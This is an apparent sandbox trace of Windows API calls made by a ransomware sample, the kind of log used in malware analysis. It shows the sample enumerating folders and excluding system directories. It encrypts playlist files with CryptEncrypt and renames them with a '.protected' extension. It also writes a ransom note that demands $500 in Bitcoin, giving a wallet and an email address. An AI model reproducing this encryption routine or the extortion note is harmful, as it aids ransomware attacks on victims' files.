CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\12_All_Video.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\0000e713\\12_all_video.wpl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0085.001] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\12_All_Video.wpl") returned 117 [0085.001] StrStrW (lpFirst="12_All_Video.wpl", lpSrch=".txt") returned 0x0 [0085.001] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\12_All_Video.wpl") returned 117 [0085.001] StrStrW (lpFirst="12_All_Video.wpl", lpSrch=".rar") returned 0x0 [0085.001] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\12_All_Video.wpl") returned 117 [0085.001] StrStrW (lpFirst="12_All_Video.wpl", lpSrch=".zip") returned 0x0 [0085.001] ReadFile (in: hFile=0x158, lpBuffer=0x4a2460, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesRead=0x295e2d4*=0x437, lpOverlapped=0x0) returned 1 [0085.006] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffffbc9, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.006] WriteFile (in: hFile=0x158, lpBuffer=0x4a2460*, nNumberOfBytesToWrite=0x437, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesWritten=0x295e2d4*=0x437, lpOverlapped=0x0) returned 1 [0085.006] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.006] WriteFile (in: hFile=0x158, lpBuffer=0x295e2ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x295e2ac*, lpNumberOfBytesWritten=0x295e2d4*=0x4, lpOverlapped=0x0) returned 1 [0085.006] WriteFile (in: hFile=0x158, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e2d4*=0x30, lpOverlapped=0x0) returned 1 [0085.006] CloseHandle (hObject=0x158) returned 1 [0085.006] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\12_All_Video.wpl.protected") returned 127 [0085.007] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\12_All_Video.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\0000e713\\12_all_video.wpl"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\12_All_Video.wpl.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\0000e713\\12_all_video.wpl.protected")) returned 1 [0085.007] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 0 [0085.007] FindClose (in: hFindFile=0x47bb10 | out: hFindFile=0x47bb10) returned 1 [0085.007] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\RESTORE_FILES.txt") returned 118 [0085.007] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\0000e713\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0085.008] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0085.008] WriteFile (in: hFile=0x154, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e2d4*=0x53d, lpOverlapped=0x0) returned 1 [0085.008] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0085.008] WriteFile (in: hFile=0x154, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e2d4*=0x2ac, lpOverlapped=0x0) returned 1 [0085.008] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0085.008] WriteFile (in: hFile=0x154, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e2d4*=0xb1, lpOverlapped=0x0) returned 1 [0085.009] CloseHandle (hObject=0x154) returned 1 [0085.009] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0085.009] lstrcmpiW (lpString1="00010C6E", lpString2="Windows") returned -1 [0085.009] lstrcmpiW (lpString1="00010C6E", lpString2="Program Files") returned -1 [0085.009] lstrcmpiW (lpString1="00010C6E", lpString2="Program Files (x86)") returned -1 [0085.009] lstrcmpiW (lpString1="00010C6E", lpString2="$Recycle.bin") returned 1 [0085.009] lstrcmpiW (lpString1="00010C6E", lpString2="System Volume Information") returned -1 [0085.009] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E") returned 100 [0085.009] lstrcmpW (lpString1="00010C6E", lpString2=".") returned 1 [0085.009] lstrcmpW (lpString1="00010C6E", lpString2="..") returned 1 [0085.009] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\*") returned 102 [0085.009] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\*", lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 0x47bb10 [0085.012] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0085.013] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0085.013] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0085.013] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0085.013] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0085.013] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\.") returned 102 [0085.013] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0085.013] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0085.013] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0085.013] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0085.013] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0085.013] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0085.013] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0085.013] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\..") returned 103 [0085.013] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0085.013] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0085.013] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0085.013] lstrcmpiW (lpString1="01_Music_auto_rated_at_5_stars.wpl", lpString2="Windows") returned -1 [0085.013] lstrcmpiW (lpString1="01_Music_auto_rated_at_5_stars.wpl", lpString2="Program Files") returned -1 [0085.013] lstrcmpiW (lpString1="01_Music_auto_rated_at_5_stars.wpl", lpString2="Program Files (x86)") returned -1 [0085.013] lstrcmpiW (lpString1="01_Music_auto_rated_at_5_stars.wpl", lpString2="$Recycle.bin") returned 1 [0085.013] lstrcmpiW (lpString1="01_Music_auto_rated_at_5_stars.wpl", lpString2="System Volume Information") returned -1 [0085.013] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\01_Music_auto_rated_at_5_stars.wpl") returned 135 [0085.013] StrStrIW (lpFirst="01_Music_auto_rated_at_5_stars.wpl", lpSrch=".protected") returned 0x0 [0085.013] lstrcmpW (lpString1="01_Music_auto_rated_at_5_stars.wpl", lpString2="RESTORE_FILES.txt") returned -1 [0085.013] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e28c | out: pbBuffer=0x295e28c) returned 1 [0085.013] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x30) returned 1 [0085.013] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\01_Music_auto_rated_at_5_stars.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\01_music_auto_rated_at_5_stars.wpl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0085.014] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\01_Music_auto_rated_at_5_stars.wpl") returned 135 [0085.014] StrStrW (lpFirst="01_Music_auto_rated_at_5_stars.wpl", lpSrch=".txt") returned 0x0 [0085.014] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\01_Music_auto_rated_at_5_stars.wpl") returned 135 [0085.014] StrStrW (lpFirst="01_Music_auto_rated_at_5_stars.wpl", lpSrch=".rar") returned 0x0 [0085.014] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\01_Music_auto_rated_at_5_stars.wpl") returned 135 [0085.014] StrStrW (lpFirst="01_Music_auto_rated_at_5_stars.wpl", lpSrch=".zip") returned 0x0 [0085.014] ReadFile (in: hFile=0x158, lpBuffer=0x4a2460, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesRead=0x295e2d4*=0x414, lpOverlapped=0x0) returned 1 [0085.016] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffffbec, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.016] WriteFile (in: hFile=0x158, lpBuffer=0x4a2460*, nNumberOfBytesToWrite=0x414, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesWritten=0x295e2d4*=0x414, lpOverlapped=0x0) returned 1 [0085.016] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.016] WriteFile (in: hFile=0x158, lpBuffer=0x295e2ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x295e2ac*, lpNumberOfBytesWritten=0x295e2d4*=0x4, lpOverlapped=0x0) returned 1 [0085.016] WriteFile (in: hFile=0x158, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e2d4*=0x30, lpOverlapped=0x0) returned 1 [0085.016] CloseHandle (hObject=0x158) returned 1 [0085.016] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\01_Music_auto_rated_at_5_stars.wpl.protected") returned 145 [0085.017] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\01_Music_auto_rated_at_5_stars.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\01_music_auto_rated_at_5_stars.wpl"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\01_Music_auto_rated_at_5_stars.wpl.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\01_music_auto_rated_at_5_stars.wpl.protected")) returned 1 [0085.017] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0085.017] lstrcmpiW (lpString1="02_Music_added_in_the_last_month.wpl", lpString2="Windows") returned -1 [0085.017] lstrcmpiW (lpString1="02_Music_added_in_the_last_month.wpl", lpString2="Program Files") returned -1 [0085.018] lstrcmpiW (lpString1="02_Music_added_in_the_last_month.wpl", lpString2="Program Files (x86)") returned -1 [0085.018] lstrcmpiW (lpString1="02_Music_added_in_the_last_month.wpl", lpString2="$Recycle.bin") returned 1 [0085.018] lstrcmpiW (lpString1="02_Music_added_in_the_last_month.wpl", lpString2="System Volume Information") returned -1 [0085.018] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\02_Music_added_in_the_last_month.wpl") returned 137 [0085.018] StrStrIW (lpFirst="02_Music_added_in_the_last_month.wpl", lpSrch=".protected") returned 0x0 [0085.018] lstrcmpW (lpString1="02_Music_added_in_the_last_month.wpl", lpString2="RESTORE_FILES.txt") returned -1 [0085.018] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e28c | out: pbBuffer=0x295e28c) returned 1 [0085.018] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x30) returned 1 [0085.018] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\02_Music_added_in_the_last_month.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\02_music_added_in_the_last_month.wpl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0085.019] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\02_Music_added_in_the_last_month.wpl") returned 137 [0085.019] StrStrW (lpFirst="02_Music_added_in_the_last_month.wpl", lpSrch=".txt") returned 0x0 [0085.019] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\02_Music_added_in_the_last_month.wpl") returned 137 [0085.019] StrStrW (lpFirst="02_Music_added_in_the_last_month.wpl", lpSrch=".rar") returned 0x0 [0085.019] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\02_Music_added_in_the_last_month.wpl") returned 137 [0085.019] StrStrW (lpFirst="02_Music_added_in_the_last_month.wpl", lpSrch=".zip") returned 0x0 [0085.019] ReadFile (in: hFile=0x158, lpBuffer=0x4a2460, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesRead=0x295e2d4*=0x4ff, lpOverlapped=0x0) returned 1 [0085.027] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffffb01, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.027] WriteFile (in: hFile=0x158, lpBuffer=0x4a2460*, nNumberOfBytesToWrite=0x4ff, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesWritten=0x295e2d4*=0x4ff, lpOverlapped=0x0) returned 1 [0085.027] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.027] WriteFile (in: hFile=0x158, lpBuffer=0x295e2ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x295e2ac*, lpNumberOfBytesWritten=0x295e2d4*=0x4, lpOverlapped=0x0) returned 1 [0085.028] WriteFile (in: hFile=0x158, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e2d4*=0x30, lpOverlapped=0x0) returned 1 [0085.028] CloseHandle (hObject=0x158) returned 1 [0085.028] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\02_Music_added_in_the_last_month.wpl.protected") returned 147 [0085.028] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\02_Music_added_in_the_last_month.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\02_music_added_in_the_last_month.wpl"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\02_Music_added_in_the_last_month.wpl.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\02_music_added_in_the_last_month.wpl.protected")) returned 1 [0085.029] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0085.029] lstrcmpiW (lpString1="03_Music_rated_at_4_or_5_stars.wpl", lpString2="Windows") returned -1 [0085.029] lstrcmpiW (lpString1="03_Music_rated_at_4_or_5_stars.wpl", lpString2="Program Files") returned -1 [0085.029] lstrcmpiW (lpString1="03_Music_rated_at_4_or_5_stars.wpl", lpString2="Program Files (x86)") returned -1 [0085.029] lstrcmpiW (lpString1="03_Music_rated_at_4_or_5_stars.wpl", lpString2="$Recycle.bin") returned 1 [0085.029] lstrcmpiW (lpString1="03_Music_rated_at_4_or_5_stars.wpl", lpString2="System Volume Information") returned -1 [0085.029] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\03_Music_rated_at_4_or_5_stars.wpl") returned 135 [0085.029] StrStrIW (lpFirst="03_Music_rated_at_4_or_5_stars.wpl", lpSrch=".protected") returned 0x0 [0085.029] lstrcmpW (lpString1="03_Music_rated_at_4_or_5_stars.wpl", lpString2="RESTORE_FILES.txt") returned -1 [0085.029] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e28c | out: pbBuffer=0x295e28c) returned 1 [0085.029] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x30) returned 1 [0085.029] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\03_Music_rated_at_4_or_5_stars.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\03_music_rated_at_4_or_5_stars.wpl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0085.030] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\03_Music_rated_at_4_or_5_stars.wpl") returned 135 [0085.030] StrStrW (lpFirst="03_Music_rated_at_4_or_5_stars.wpl", lpSrch=".txt") returned 0x0 [0085.030] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\03_Music_rated_at_4_or_5_stars.wpl") returned 135 [0085.030] StrStrW (lpFirst="03_Music_rated_at_4_or_5_stars.wpl", lpSrch=".rar") returned 0x0 [0085.030] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\03_Music_rated_at_4_or_5_stars.wpl") returned 135 [0085.030] StrStrW (lpFirst="03_Music_rated_at_4_or_5_stars.wpl", lpSrch=".zip") returned 0x0 [0085.030] ReadFile (in: hFile=0x158, lpBuffer=0x4a2460, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesRead=0x295e2d4*=0x4f3, lpOverlapped=0x0) returned 1 [0085.031] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffffb0d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.031] WriteFile (in: hFile=0x158, lpBuffer=0x4a2460*, nNumberOfBytesToWrite=0x4f3, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesWritten=0x295e2d4*=0x4f3, lpOverlapped=0x0) returned 1 [0085.032] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.032] WriteFile (in: hFile=0x158, lpBuffer=0x295e2ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x295e2ac*, lpNumberOfBytesWritten=0x295e2d4*=0x4, lpOverlapped=0x0) returned 1 [0085.032] WriteFile (in: hFile=0x158, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e2d4*=0x30, lpOverlapped=0x0) returned 1 [0085.032] CloseHandle (hObject=0x158) returned 1 [0085.032] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\03_Music_rated_at_4_or_5_stars.wpl.protected") returned 145 [0085.032] MoveFileW 